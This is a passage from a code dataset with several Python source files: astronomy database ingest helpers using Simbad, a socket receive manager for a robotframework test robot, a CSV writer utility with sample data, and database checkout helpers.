bool\n#\n# See Also\n# --------\n# search_publication: Function to find publications in the database\n# add_publication: Function to add publications to the database\n#\n# \"\"\"\n#\n# # TODO: provide an option to add missing information\n# # add_doi_bibcode = db.Publications.update().where(db.Publications.c.name == 'Manj19'). \\\n# # values(bibcode='2019AJ....157..101M', doi='10.3847/1538-3881/aaf88f',\n# # description='Cloud Atlas: HST nir spectral library')\n# # db.engine.execute(add_doi_bibcode)\n#\n# # change_name = db.Publications.update().where(db.Publications.c.name == 'Wein12'). \\\n# # values(name='Wein13')\n# # db.engine.execute(change_name)\n#\n# return\n\n\n# Make sure all source names are Simbad resolvable:\ndef check_names_simbad(ingest_names, ingest_ra, ingest_dec, radius='2s', verbose=False):\n resolved_names = []\n n_sources = len(ingest_names)\n n_name_matches = 0\n n_selections = 0\n n_nearby = 0\n n_notfound = 0\n\n for i, ingest_name in enumerate(ingest_names):\n # Query Simbad for identifiers matching the ingest source name\n identifer_result_table = Simbad.query_object(ingest_name, verbose=False)\n\n # Successfully resolved one matching identifier in Simbad\n if identifer_result_table is not None and len(identifer_result_table) == 1:\n # Add the Simbad resolved identifier ot the resolved_name list and deals with unicode\n if isinstance(identifer_result_table['MAIN_ID'][0], str):\n resolved_names.append(identifer_result_table['MAIN_ID'][0])\n else:\n resolved_names.append(identifer_result_table['MAIN_ID'][0].decode())\n verboseprint(resolved_names[i], \"Found name match in Simbad\", verbose=verbose)\n n_name_matches = n_name_matches + 1\n\n # If no identifier match found, search within \"radius\" of coords for a Simbad object\n else:\n verboseprint(\"searching around \", ingest_name, verbose=verbose)\n coord_result_table = Simbad.query_region(\n SkyCoord(ingest_ra[i], ingest_dec[i], unit=(u.deg, u.deg), frame='icrs'),\n radius=radius, verbose=verbose)\n\n # If no match is found in Simbad, use the name in the ingest table\n if coord_result_table is None:\n resolved_names.append(ingest_name)\n verboseprint(\"coord search failed\", verbose=verbose)\n n_notfound = n_notfound + 1\n\n # If more than one match found within \"radius\", query user for selection and append to resolved_name\n elif len(coord_result_table) > 1:\n for j, name in enumerate(coord_result_table['MAIN_ID']):\n print(f'{j}: {name}')\n selection = int(input('Choose \\n'))\n if isinstance(coord_result_table['MAIN_ID'][selection], str):\n resolved_names.append(coord_result_table['MAIN_ID'][selection])\n else:\n resolved_names.append(coord_result_table['MAIN_ID'][selection].decode())\n verboseprint(resolved_names[i], \"you selected\", verbose=verbose)\n n_selections = n_selections + 1\n\n # If there is only one match found, accept it and append to the resolved_name list\n elif len(coord_result_table) == 1:\n if isinstance(coord_result_table['MAIN_ID'][0], str):\n resolved_names.append(coord_result_table['MAIN_ID'][0])\n else:\n resolved_names.append(coord_result_table['MAIN_ID'][0].decode())\n verboseprint(resolved_names[i], \"only result nearby in Simbad\", verbose=verbose)\n n_nearby = n_nearby + 1\n\n # Report how many find via which methods\n print(\"Names Found:\", n_name_matches)\n print(\"Names Selected\", n_selections)\n print(\"Names Found\", n_nearby)\n print(\"Not found\", n_notfound)\n\n n_found = n_notfound + n_name_matches + n_selections + n_nearby\n print('problem' if n_found != n_sources else (n_sources, 'names'))\n\n return resolved_names\n\n\ndef convert_spt_string_to_code(spectral_types, verbose=False):\n \"\"\"\n normal tests: M0, M5.5, L0, L3.5, T0, T3, T4.5, Y0, Y5, Y9.\n weird TESTS: sdM4, ≥Y4, T5pec, L2:, L0blue, Lpec, >L9, >M10, >L, T, Y\n digits are needed in current implementation.\n :param spectral_types:\n :param verbose:\n :return:\n \"\"\"\n\n spectral_type_codes = []\n for spt in spectral_types:\n verboseprint(\"Trying to convert:\", spt, verbose=verbose)\n spt_code = np.nan\n\n if spt == \"\":\n spectral_type_codes.append(spt_code)\n verboseprint(\"Appended NAN\", verbose=verbose)\n continue\n\n # identify main spectral class, loop over any prefix text to identify MLTY\n for i, item in enumerate(spt):\n if item == 'M':\n spt_code = 60\n break\n elif item == 'L':\n spt_code = 70\n break\n elif item == 'T':\n spt_code = 80\n break\n elif item == 'Y':\n spt_code = 90\n break\n else: # only trigger if not MLTY\n i = 0\n # find integer or decimal subclass and add to spt_code\n\n spt_code += float(re.findall('\\d*\\.?\\d+', spt[i + 1:])[0])\n spectral_type_codes.append(spt_code)\n verboseprint(spt, spt_code, verbose=verbose)\n return spectral_type_codes\n\n\ndef ingest_sources(db, sources, ras, decs, references, comments=None, epochs=None,\n equinoxes=None, verbose=False, save_db=False):\n \"\"\"\n Script to ingest sources\n\n Parameters\n ----------\n db\n sources\n ras\n decs\n references\n comments\n epochs\n equinoxes\n verbose\n save_db\n\n Returns\n -------\n\n \"\"\"\n\n n_added = 0\n n_sources = len(sources)\n\n if epochs is None:\n epochs = [None] * n_sources\n if equinoxes is None:\n equinoxes = [None] * n_sources\n if comments is None:\n comments = [None] * n_sources\n\n for i, source in enumerate(sources):\n\n # Construct data to be added\n source_data = [{'source': sources[i],\n 'ra': ras[i],\n 'dec': decs[i],\n 'reference': references[i],\n 'epoch': epochs[i],\n 'equinox': equinoxes[i],\n 'comments': comments[i]}]\n verboseprint(source_data, verbose=verbose)\n\n try:\n db.Sources.insert().execute(source_data)\n n_added += 1\n except sqlalchemy.exc.IntegrityError:\n # try reference without last letter e.g.Smit04 instead of Smit04a\n if source_data[0]['reference'][-1] in ('a', 'b'):\n source_data[0]['reference'] = references[i][:-1]\n try:\n db.Sources.insert().execute(source_data)\n n_added += 1\n except sqlalchemy.exc.IntegrityError:\n raise SimpleError(\"Discovery reference may not exist in the Publications table. \"\n \"Add it with add_publication function. \")\n else:\n raise SimpleError(\"Discovery reference may not exist in the Publications table. \"\n \"Add it with add_publication function. \")\n\n if save_db:\n db.save_database(directory='data/')\n print(n_added, \"sources added to database and saved\")\n else:\n print(n_added, \"sources added to database\")\n\n return\n\n\ndef ingest_parallaxes(db, sources, plxs, plx_errs, plx_refs, verbose=False):\n \"\"\"\n\n Parameters\n ----------\n db\n Database object\n sources\n list of source names\n plxs\n list of parallaxes corresponding to the sources\n plx_errs\n list of parallaxes uncertainties\n plx_refs\n list of references for the parallax data\n verbose: bool, optional\n If true, outputs information to the screen\n\n Examples\n ----------\n > ingest_parallaxes(db, my_sources, my_plx, my_plx_unc, my_plx_refs, verbose = True)\n\n \"\"\"\n\n n_added = 0\n\n for i, source in enumerate(sources): # loop through sources with parallax data to ingest\n db_name = db.search_object(source, output_table='Sources')[0]['source']\n\n # Search for existing parallax data and determine if this is the best\n # If no previous measurement exists, set the new one to the Adopted measurement\n adopted = None\n duplicate = False\n source_plx_data = db.query(db.Parallaxes).filter(db.Parallaxes.c.source == db_name).table()\n\n if source_plx_data is None or len(source_plx_data) == 0:\n # if there's no other measurements in the database, set new data Adopted = True\n adopted = True\n old_adopted = None\n elif len(source_plx_data) > 0: # Parallax data already exists\n # check for duplicate measurement\n dupe_ind = source_plx_data['reference'] == plx_refs[i]\n if sum(dupe_ind):\n duplicate = True\n verboseprint(\"Duplicate measurement\\n\", source_plx_data[dupe_ind])\n else:\n duplicate = False\n verboseprint(\"!!! Another Proper motion measurement exists,\")\n if verbose:\n source_plx_data.pprint_all()\n\n # check for previous adopted measurement and find new adopted\n adopted_ind = source_plx_data['adopted'] == 1\n if sum(adopted_ind):\n old_adopted = source_plx_data[adopted_ind]\n\n # if errors of new data are less than other measurements, set Adopted = True.\n if plx_errs[i] < min(source_plx_data['parallax_error']):\n adopted = True\n\n # unset old adopted\n if old_adopted:\n db.Parallaxes.update().where(and_(db.Parallaxes.c.source == old_adopted['source'],\n db.Parallaxes.c.reference == old_adopted['reference'])).\\\n values(adopted=False).execute()\n # check that adopted flag is successfully changed\n old_adopted_data = db.query(db.Parallaxes).filter(and_(db.Parallaxes.c.source == old_adopted['source'],\n db.Parallaxes.c.reference == old_adopted['reference'])).table()\n verboseprint(\"Old adopted measurement unset\\n\", old_adopted_data)\n\n verboseprint(\"The new measurement's adopted flag is:\", adopted)\n\n else:\n raise RuntimeError(\"Unexpected state\")\n\n if not duplicate:\n # Construct data to be added\n parallax_data = [{'source': db_name,\n 'parallax': str(plxs[i]),\n 'parallax_error': str(plx_errs[i]),\n 'reference': plx_refs[i],\n 'adopted': adopted}]\n\n verboseprint(parallax_data, verbose=verbose)\n\n try:\n db.Parallaxes.insert().execute(parallax_data)\n n_added += 1\n except sqlalchemy.exc.IntegrityError:\n raise SimpleError(\"The source may not exist in Sources table.\\n\"\n \"The parallax reference may not exist in Publications table. \"\n \"Add it with add_publication function. \\n\"\n \"The parallax measurement may be a duplicate.\")\n\n print(\"Parallaxes added to database: \", n_added)\n\n return\n\n\ndef ingest_proper_motions(db, sources, pm_ras, pm_ra_errs, pm_decs, pm_dec_errs, pm_references, save_db=False,\n verbose=False):\n \"\"\"\n\n Parameters\n ----------\n db\n Database object\n sources\n list of source names\n pm_ras\n list of proper motions in right ascension (RA)\n pm_ra_errs\n list of uncertanties in proper motion RA\n pm_decs\n list of proper motions in declination (dec)\n pm_dec_errs\n list of uncertanties in proper motion dec\n pm_references\n list of references for the proper motion measurements\n save_db: bool, optional\n If set to False (default), will modify the .db file, but not the JSON files\n If set to True, will save the JSON files\n verbose: bool, optional\n If true, outputs information to the screen\n\n Examples\n ----------\n > ingest_proper_motions(db, my_sources, my_pm_ra, my_pm_ra_unc, my_pm_dec, my_pm_dec_unc, my_pm_refs,\n verbose = True)\n\n \"\"\"\n\n n_added = 0\n\n for i, source in enumerate(sources):\n db_name_match = db.search_object(source, output_table='Sources', fuzzy_search=False)\n\n # If no matches, try fuzzy search\n if len(db_name_match) == 0:\n db_name_match = db.search_object(source, output_table='Sources', fuzzy_search=True)\n\n # If still no matches, try to resolve the name with Simbad\n if len(db_name_match) == 0:\n db_name_match = db.search_object(source, output_table='Sources', resolve_simbad=True)\n\n if len(db_name_match) == 1:\n db_name = db_name_match['source'][0]\n verboseprint(\"\\n\", db_name, \"One source match found\", verbose=verbose)\n elif len(db_name_match) > 1:\n print(\"\\n\", source)\n print(db_name_match)\n raise RuntimeError(source, \"More than one match source found in the database\")\n elif len(db_name_match) == 0:\n print(\"\\n\", source)\n raise RuntimeError(source, \"No source found in the database\")\n else:\n print(\"\\n\", source)\n print(db_name_match)\n raise RuntimeError(source, \"unexpected condition\")\n\n # Search for existing proper motion data and determine if this is the best\n # If no previous measurement exists, set the new one to the Adopted measurement\n adopted = None\n duplicate = False\n source_pm_data = db.query(db.ProperMotions).filter(db.ProperMotions.c.source == db_name).table()\n if source_pm_data is None or len(source_pm_data) == 0:\n # if there's no other measurements in the database, set new data Adopted = True\n adopted = True\n duplicate = False\n elif len(source_pm_data) > 0:\n # check to see if other measurement is a duplicate of the new data\n for pm_data in source_pm_data:\n if pm_data['reference'] == pm_references[i]:\n duplicate = True\n verboseprint(\"Duplicate measurement\\n\", pm_data, verbose=verbose)\n if not duplicate:\n # if errors of new data are less than other measurements, set Adopted = True.\n if pm_ra_errs[i] < min(source_pm_data['mu_ra_error']) and pm_dec_errs[i] < min(\n source_pm_data['mu_dec_error']):\n adopted = True\n elif min(source_pm_data['mu_ra_error']) < pm_ra_errs[i] and min(source_pm_data['mu_dec_error']) < \\\n pm_dec_errs[i]:\n # TODO: implement approach from ingest_parallaxes to set/unset adopted flag\n adopted_pm = db.ProperMotions.update().where(and_(db.ProperMotions.c.source == db_name,\n db.ProperMotions.c.mu_ra_error == min(\n source_pm_data['mu_ra_error']),\n db.ProperMotions.c.mu_dec_error == min(\n source_pm_data['mu_dec_error']))). \\\n values(adopted=True)\n db.engine.execute(adopted_pm)\n verboseprint(\"Will eventually make measurement with min ra and dec errors Adopted.\",\n verbose=verbose)\n\n verboseprint(\"!!! Another Proper motion exists, Adopted:\", adopted, verbose=verbose)\n if verbose:\n source_pm_data.pprint_all()\n\n else:\n raise RuntimeError(\"Unexpected state\")\n\n # Construct data to be added\n if not duplicate:\n pm_data = [{'source': db_name,\n 'mu_ra': pm_ras[i],\n 'mu_ra_error': pm_ra_errs[i],\n 'mu_dec': pm_decs[i],\n 'mu_dec_error': pm_dec_errs[i],\n 'adopted': adopted,\n 'reference': pm_references[i]}]\n verboseprint('Proper motion data to add: ', pm_data, verbose=verbose)\n\n try:\n db.ProperMotions.insert().execute(pm_data)\n n_added += 1\n except sqlalchemy.exc.IntegrityError:\n raise SimpleError(\"The source may not exist in Sources table.\\n\"\n \"The proper motion reference may not exist in Publications table. \"\n \"Add it with add_publication function. \\n\"\n \"The proper motion measurement may be a duplicate.\")\n\n if save_db:\n db.save_database(directory='data/')\n print(\"Proper motions added to database and saved: \", n_added)\n else:\n print(\"Proper motions added to database: \", n_added)\n\n return\n\n\ndef ingest_photometry(db, sources, bands, magnitudes, magnitude_errors, reference, ucds=None,\n telescope=None, instrument=None, epoch=None, comments=None, verbose=False):\n\n n_added = 0\n\n n_sources = len(sources)\n\n if n_sources != len(magnitudes) or n_sources != len(magnitude_errors):\n raise RuntimeError(\"N Sources:\",len(sources), \" N Magnitudes\", len(magnitudes), \" N Mag errors:\",\n len(magnitude_errors),\n \"\\nSources, magnitudes, and magnitude error lists should all be same length\")\n\n if isinstance(bands, str):\n bands = [bands] * len(sources)\n\n if isinstance(reference, str):\n reference = [reference] * len(sources)\n\n if isinstance(telescope, str):\n telescope = [telescope] * len(sources)\n\n if isinstance(instrument, str):\n instrument = [instrument] * len(sources)\n\n if isinstance(ucds, str):\n ucds = [ucds] * len(sources)\n\n if n_sources != len(reference) or n_sources != len(telescope) or n_sources != len(bands):\n raise RuntimeError(\"All lists should be same length\")\n\n for i, source in enumerate(sources):\n db_name = db.search_object(source, output_table='Sources')[0]['source']\n\n # Construct data to be added\n photometry_data = [{'source': db_name,\n 'band': bands[i],\n 'ucd': ucds[i],\n 'magnitude': magnitudes[i],\n 'magnitude_error': magnitude_errors[i],\n 'telescope': telescope[i],\n 'instrument': instrument[i],\n 'epoch': epoch,\n 'comments': comments,\n 'reference': reference[i]}]\n verboseprint('Photometry data: ', photometry_data, verbose=verbose)\n\n try:\n db.Photometry.insert().execute(photometry_data)\n n_added += 1\n except sqlalchemy.exc.IntegrityError:\n raise SimpleError(\"The source may not exist in Sources table.\\n\"\n \"The reference may not exist in the Publications table. \"\n \"Add it with add_publication function. \\n\"\n \"The measurement may be a duplicate.\")\n\n print(\"Photometry measurements added to database: \", n_added)\n\n return\n\n\ndef find_in_simbad(sources, desig_prefix, source_id_index = None, verbose = False):\n \"\"\"\n Function to extract source designations from SIMBAD\n\n Parameters\n ----------\n sources\n desig_prefix\n source_id_index\n verbose\n\n Returns\n -------\n Astropy table\n\n \"\"\"\n\n n_sources = len(sources)\n\n Simbad.reset_votable_fields()\n Simbad.add_votable_fields('typed_id') # keep search term in result table\n Simbad.add_votable_fields('ids') # add all SIMBAD identifiers as an output column\n print(\"simbad query started\")\n result_table = Simbad.query_objects(sources)\n print(\"simbad query ended\")\n\n ind = result_table['SCRIPT_NUMBER_ID'] > 0 # find indexes which contain results\n\n simbad_ids = result_table['TYPED_ID', 'IDS'][ind] # .topandas()\n\n db_names = []\n simbad_designations = []\n if source_id_index is not None:\n source_ids = []\n\n for row in simbad_ids:\n db_name = row['TYPED_ID']\n ids = row['IDS'].split('|')\n designation = [i for i in ids if desig_prefix in i]\n\n if designation:\n verboseprint(db_name, designation[0])\n db_names.append(db_name)\n simbad_designations.append(designation[0])\n if source_id_index is not None:\n source_id = designation[0].split()[source_id_index]\n source_ids.append(int(source_id)) #convert to int since long in Gaia\n\n n_matches = len(db_names)\n print('Found', n_matches, desig_prefix, ' sources for', n_sources, ' sources')\n\n result_table = Table([db_names, simbad_designations, source_ids],\n names=('db_names', 'designation', 'source_id'))\n\n return result_table","sub_path":"scripts/ingests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":40833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"203197677","text":"#coding=utf8\n\n'''\n@author: chengjie\n'''\n \nimport threading\nimport Queue\nimport select\nimport robot_Actions\nfrom robot.api import logger\nimport struct\nimport LGN\n# 配合robotframework 改用其自带的logger输出,使用logging时,会出现意外的配置文件无法找到的情况。必须要写完整路径才可以使用,比较麻烦\n#import logging\n#import logging.config\n#logging.config.fileConfig(\"logging.config\")\n#logger = logging.getLogger(\"simpleExample\")\nimport copy\nimport time\nregisterSocks = {}\nbg_thread_flag = True\nmax_robots = 1\nbg_thread_lock = threading.Lock()\nregisterSocks_Queue = Queue.Queue()\nUNregisterSocks_Queue = Queue.Queue()\n\ndef registerManager():\n \"\"\"\n # 注册管理机\n # 当有外部的机器人,需要注册收包的sock时,需要将自己的sock通过注册管道传递到这里,添加到可使用的字典内。\n \"\"\"\n global bg_thread_lock, bg_thread_flag, registerSocks, registerSocks_Queue, UNregisterSocks_Queue\n \n while bg_thread_flag:\n bg_thread_lock.acquire()\n \"\"\"\n # 处理传入sock,注册到数据字典内\n # 这里的原子操作为:获取机器人客户端传入的待操作sock,并且,建立一个对应的数据书写管道,将管道的对象发送回客户端\n \"\"\"\n if not registerSocks_Queue.empty():\n newRegister_sock = registerSocks_Queue.get()\n logger.info(\"get sock [%s] registered.\" % newRegister_sock)\n registerSocks[newRegister_sock] = Queue.Queue()\n bg_thread_lock.release()\n \n \"\"\"\n # 处理传入sock,从数据字典内删除\n \"\"\"\n bg_thread_lock.acquire()\n if not UNregisterSocks_Queue.empty():\n delRegister_sock = UNregisterSocks_Queue.get()\n logger.info(\"get sock [%s] unregistered.\" % newRegister_sock)\n del registerSocks[delRegister_sock]\n bg_thread_lock.release() \n \n logger.info(\"registerManager exited\")\n \ndef recvManager():\n \n \"\"\"\n # 收包管理机\n \"\"\"\n global bg_thread_lock, bg_thread_flag, registerSocks\n \n selectWaitTime = 0.0 \n sd = {}\n recvable = []\n def returnBroken(o = False, p = \"\", b = \"\", h = []):\n return {\"ok\": o, \"packet\": p, \"BrokenPacket\": b, \"header\":[]}\n \n def recvData(sock, data):\n MINSocketHeaderLength = 16\n SocketHeaderProtocol = \">iiii\"\n packet, BrokenPacket = data[\"packet\"], data[\"BrokenPacket\"]\n # 合并断包数据\n if len(BrokenPacket):\n packet += BrokenPacket\n BrokenPacket = \"\"\n try:\n packet += sock.recv(1024)\n # 若接收、合并出来的是空包,则返回空数据结构\n if not len(packet):\n return returnBroken()\n except:\n return returnBroken(b = packet)\n \n if len(packet) < MINSocketHeaderLength:# 其长度必须大于16,即至少包含最小的header数据\n return returnBroken(b = packet)\n # 分解包头数据 \n PackHeader, PackBody = packet[:MINSocketHeaderLength], packet[MINSocketHeaderLength:]\n try:\n tag, packetLength, systemID, protoID = struct.unpack(SocketHeaderProtocol, PackHeader)\n header = tag, packetLength, systemID, protoID\n packetLength -= MINSocketHeaderLength\n if packetLength <= 0:\n return returnBroken(b = packet)\n except:\n return returnBroken(b = packet)\n \n # 分析包体数据\n if packetLength == len(PackBody):\n #logger.info(\"PAKCAGEINFO : package length is %s -- received data length is -- %s\" % (packetLength, len(packet)))\n return returnBroken(o = True, p = packet, h = header)\n elif packetLength < len(PackBody):\n PackData, BrokenPacket = PackBody[:packetLength], PackBody[packetLength:] \n packet = PackHeader + PackData\n #logger.info(\"PACKAGEINFO : package is larger than definition, length is %s -- received data length is -- %s\" % (packetLength, len(packet)))\n return returnBroken(o = True, p = packet, b = BrokenPacket, h = header)\n elif packetLength > len(PackBody):\n #logger.info(\"PACKAGEINFO : package is smaller than definition, length is %s -- received data length is -- %s\" % (packetLength,len(PackBody)))\n return returnBroken(b = packet, h = header)\n \n \n while bg_thread_flag:\n \"\"\"bg_thread_lock.acquire()\n \"\"\"\n # 清理不存在的sock数据\n \"\"\"\n for ns in registerSocks.keys():\n try:\n ns.fileno()\n except:\n logger.info(\"sock [%s] not exists, delete it from registerSocks_Queue.\" % ns)\n del registerSocks[ns]\n bg_thread_lock.release()\n \"\"\"\n if not len(registerSocks):# 若长度为空,则返回等待新数据过来\n continue\n \n recvable , sendable , exceptional = select.select(registerSocks.keys(), [], [], selectWaitTime)\n \n if len(recvable):\n for sock in recvable:\n bg_thread_lock.acquire()\n if sock not in sd:\n logger.info(\"sock [%s] initialized\" % sock)\n sd[sock] = {\"ok\": False, \"packet\":\"\", \"BrokenPacket\": \"\", \"header\":[]}# 数据结构初始化\n \n #logger.info(\"sock [%s] receiving data.\" % sock)\n sd[sock] = recvData(sock, sd[sock])\n bg_thread_lock.release()\n \n if sd[sock][\"ok\"]:\n bg_thread_lock.acquire()\n #logger.info(sd[sock][\"ok\"])\n #logger.info(\"data is ready. sock [%s] \" % sock)\n #logger.info(\"data is [%s]\" % repr(sd[sock]))\n \n sockdata = copy.deepcopy(sd[sock])\n registerSocks[sock].put(sockdata)\n \n #logger.info(\"data is [%s]\" % repr(sockdata))\n sd[sock][\"packet\"] = \"\"\n sd[sock][\"ok\"] = False\n bg_thread_lock.release()\n logger.info(\"manager thread exited.\")\n\ndef robotCheck(robots):\n global bg_thread_flag\n while bg_thread_flag:\n if len([robot for robot in robots if robot.isAlive()]) == 0:\n bg_thread_flag = False\n logger.info(\"all robots exited.\")\n\n\ndef StartRobot(Host, Port):\n global bg_thread_lock, bg_thread_flag, registerSocks_Queue, UNregisterSocks_Queue\n sock = robot_Actions.ConnectHandler(Host, Port)\n logger.info(LGN.Action_Msg_04 % sock)\n bg_thread_lock.acquire()\n registerSocks_Queue.put(sock)\n bg_thread_lock.release()\n return sock\n\n\ndef robotManager():\n \n global max_robots#bg_thread_lock, bg_thread_flag, registerSocks_Queue, UNregisterSocks_Queue\n \n nt_registerManager = threading.Thread(target = registerManager)\n nt_registerManager.start()\n nt_recvManager = threading.Thread(target = recvManager)\n nt_recvManager.start()\n #nt_registerManager.join()\n #nt_recvManager.join()\n \"\"\"\n #tt = []\n #from multiprocessing.dummy import Pool as ThreadPool\n logger.info(\"started\")\n import threadpool\n pool = threadpool.ThreadPool(2)\n reqs = threadpool.makeRequests(robotworker, [])\n [ pool.putRequest(req) for req in reqs ]\n pool.wait()\n \nclass robotworker(object):\n global bg_thread_lock, bg_thread_flag, registerSocks_Queue, UNregisterSocks_Queue, max_robots\n \n def __init__(self):\n \n #self.sock = ConnectHandler(\"120.25.152.35\", 8091)\n self.sock = ConnectHandler(\"192.168.1.119\", 8091)\n logger.info(\"robot started. sock [%s]\" % self.sock)\n bg_thread_lock.acquire()\n registerSocks_Queue.put(self.sock)\n \n \n bg_thread_lock.release()\n \n st = time.time()\n self.sock.send(encrypt_LaunchRequest_Pack(protobuf = (1, 2, 1), account = str(max_robots + 1), password =\"121234561233\", device=\"1236578557321\" ))\n while 1:\n if registerSocks.has_key(self.sock) and not registerSocks[self.sock].empty():\n data = registerSocks[self.sock].get()\n #logger.info(registerSocks[self.sock].empty())\n #logger.info(data)\n cryptdata = decrypt_LaunchRequest_Pack(data[\"packet\"])\n logger.info(time.time() - st)\n UNregisterSocks_Queue.put(self.sock)\n break\"\"\"\n\n\n ","sub_path":"rf_test_lib/robot_main.py","file_name":"robot_main.py","file_ext":"py","file_size_in_byte":8580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"297378913","text":"# coding:utf-8\n\nimport csv\nfrom collections import OrderedDict\n\n\ndef install_patch():\n csv.DictWriter = DictManager\n\n\nclass DictManager:\n \"\"\" 按照指定顺序写入csv文件\n 1. -> DictManager(open(\"test.scv\", \"wb\"), keys=OrderedDict([(\"id\", \"ID\"),(\"url\", \"链接地址\"),])\n ).writeheader().writerows([{},{},....])\n 2. -> DictManager(open(\"test.scv\", \"wb\"),\n keys=[\"id\", \"flower\", \"url\", \"online\"],\n headers=[\"ID\", \"其他\", \"直播地址\", \"在线人数\"]\n ).writerows([{},{},....])\n \"\"\"\n\n def __init__(self, file, keys, headers=(), dialect=\"excel\", *args, **kwargs):\n self.keys, self.headers = keys, headers\n if isinstance(keys, OrderedDict):\n self.keys, self.headers = zip(*[(key, value) for key, value in keys.iteritems()])\n self.writer = csv.writer(file, dialect, *args, **kwargs)\n\n def writeheader(self, headers=()):\n return self.writer.writerow(headers or self.headers) or self\n\n def writerow(self, rowdict):\n return self.writer.writerow([rowdict[key] for key in self.keys]) or self\n\n def writerows(self, rowlist):\n return map(self.writerow, rowlist) or self\n\n\nif __name__ == '__main__':\n result = {\n \"2218262\": {\n \"flower\": \"90200\",\n \"url\": \"http://www.tuho.tv/2218262\",\n \"nick\": \"2030丶♚千♞足♚\",\n \"fans\": \"291粉丝\",\n \"intro\": \"不把我怼爽,你特么的滚远点。。。\",\n \"online\": \"1605人在看\",\n \"id\": 2218262\n },\n \"3016952\": {\n \"flower\": \"92750\",\n \"url\": \"http://www.tuho.tv/3016952\",\n \"nick\": \"✨自⭐己✨\",\n \"fans\": \"224粉丝\",\n \"intro\": \"陪你聊聊天,为你唱首歌,我的驿站等你来做客~\",\n \"online\": \"1602人在看\",\n \"id\": 3016952\n },\n \"4963215\": {\n \"flower\": \"104201\",\n \"url\": \"http://www.tuho.tv/4963215\",\n \"nick\": \"甜心小公主\",\n \"fans\": \"5011粉丝\",\n \"intro\": \"直播时间下午一点,晚上九点,风里雨里直播间等你😚\",\n \"online\": \"2373人在看\",\n \"id\": 4963215\n },\n \"6360024\": {\n \"flower\": \"63901\",\n \"url\": \"http://www.tuho.tv/6360024\",\n \"nick\": \"柠檬味的芋头\",\n \"fans\": \"287粉丝\",\n \"intro\": \"来看主播不后悔😘\",\n \"online\": \"1601人在看\",\n \"id\": 6360024\n },\n \"6792870\": {\n \"flower\": \"9400\",\n \"url\": \"http://www.tuho.tv/6792870\",\n \"nick\": \"a怀中猫\",\n \"fans\": \"607粉丝\",\n \"intro\": \"游泳馆\",\n \"online\": \"1264人在看\",\n \"id\": 6792870\n },\n \"6802918\": {\n \"flower\": \"8700\",\n \"url\": \"http://www.tuho.tv/6802918\",\n \"nick\": \"既然青春留不住(1105)\",\n \"fans\": \"326粉丝\",\n \"intro\": \"因为有了你们,人生才变的如此精彩!感谢你们的陪伴!么么哒\",\n \"online\": \"828人在看\",\n \"id\": 6802918\n },\n \"6982094\": {\n \"flower\": \"0\",\n \"url\": \"http://www.tuho.tv/6982094\",\n \"nick\": \"阿孜古丽苏姆\",\n \"fans\": \"0粉丝\",\n \"intro\": \"聊天可否\",\n \"online\": \"204人在看\",\n \"id\": 6982094\n }\n }\n\n DictManager(open(\"test.scv\", \"wb\"), keys=OrderedDict(\n [(\"id\", \"ID\"), (\"url\", \"链接地址\"), ])\n ).writeheader().writerows(result.itervalues())\n","sub_path":"utils/csv_dict.py","file_name":"csv_dict.py","file_ext":"py","file_size_in_byte":3670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"386915925","text":"# -*- coding:utf-8 -*-\n'''\nCreated on Jul 19, 2012\n\n@author: zst\n'''\nimport time,os\nfrom com.zctt.iaap.paf.pafsys import systemProperties,geti18nString,timeout\nfrom xml.etree.ElementTree import ElementTree\nfrom com.zctt.iaap.paf.core.datasetdef import OPResult\nfrom com.zctt.iaap.paf.core.errcode import CommonError,CommonDBError\n\n\nclass PrivacyPolicyConfig:\n '''隐私策略配置实体类\n name:(string)字段名称,\n mark:(string)字段策略隐藏符,\n start:(int)隐藏字符的起始位置,\n end:(int)隐藏字符的结束位置,\n caption:(string) 字段中文名称\n '''\n def __init__(self,name,mark,start,end,caption):\n self.name=name\n self.mark=mark\n self.start=int(start)\n self.end=int(end)\n self.caption=caption\n \ndef checkoutItem(checkoutItems,args):\n try:\n id = args[0]\n uid = args[1]\n #如果已经迁出,需要查看是不是自己迁出的\n if checkoutItems.has_key(id):\n #不是自己迁出,看操作是否超时\n if checkoutItems[id]['uid'] != uid:\n #超时后允许继续迁出\n nowTime = time.time()\n if nowTime - checkoutItems[id]['time'] > timeout:\n checkoutItems[id] = {'time':time.time(), 'uid':uid}\n return OPResult(None,CommonError.NO_ERROR,None)\n else:\n return OPResult(None,CommonDBError.DataAlreadyCheckedout,geti18nString('element has already been checked out'))\n else:#自己迁出要更新迁出信息\n checkoutItems[id] = {'time':time.time(), 'uid':uid}\n return OPResult(None,CommonError.NO_ERROR,None)\n else:\n checkoutItems[id] = {'time':time.time(), 'uid':uid}\n return OPResult(None,CommonError.NO_ERROR,None)\n except Exception as e:\n return OPResult(None,CommonDBError.UnknownException,str(e))\n \ndef checkinItem(checkoutItems,args):\n '''\n 释放修改权限\n '''\n try:\n id = args[0]\n checkoutItems.pop(id, None)\n return OPResult(None,CommonError.NO_ERROR,None)\n except Exception as e:\n return OPResult(None,CommonDBError.UnknownException,str(e))\n\ndef clearOutTimeCheckOutItem(checkoutItems):\n '''\n 清除超时的迁出项\n '''\n if len(checkoutItems.items())==0:\n return\n nowTime = time.time()\n for key in checkoutItems.iterkeys():\n if nowTime - checkoutItems[key]['time'] > timeout:\n checkoutItems.pop(key, None)\n \ndef executeSqlOperation(dbConn, sql):\n isSuccess = False\n if dbConn:\n affectedRowCount = dbConn.executeNoQuery(sql)\n if affectedRowCount >= 0: isSuccess = True\n return isSuccess \ndef isExistedItem(sql,dbConn):\n ''' 判断项目是否已存在 '''\n isExisted = False\n records = dbConn.executeQuery(sql)\n if records and records[0][0] is not None:\n if int(records[0][0]) > 0:\n isExisted = True\n return isExisted \ndef commitOrRollback(isSuccess,dbConn):\n ''' 判断项目是提交还是回滚 '''\n errCode = OPResult(None,CommonError.NO_ERROR,None)\n if isSuccess:\n dbConn.commit()\n else:\n errCode = OPResult(None,CommonError.DBErr,None)\n dbConn.rollback()\n dbConn.close()\n return errCode\ndef parsePrivacyPolicyConfig(privacyPolicyFields):\n ''' 解析隐私策略配置 '''\n tree = ElementTree()\n xmlFields = tree.parse(os.path.join(systemProperties['ConfigFilePath'],'systemmanager/PrivacyPolicyConfig.xml'))\n# 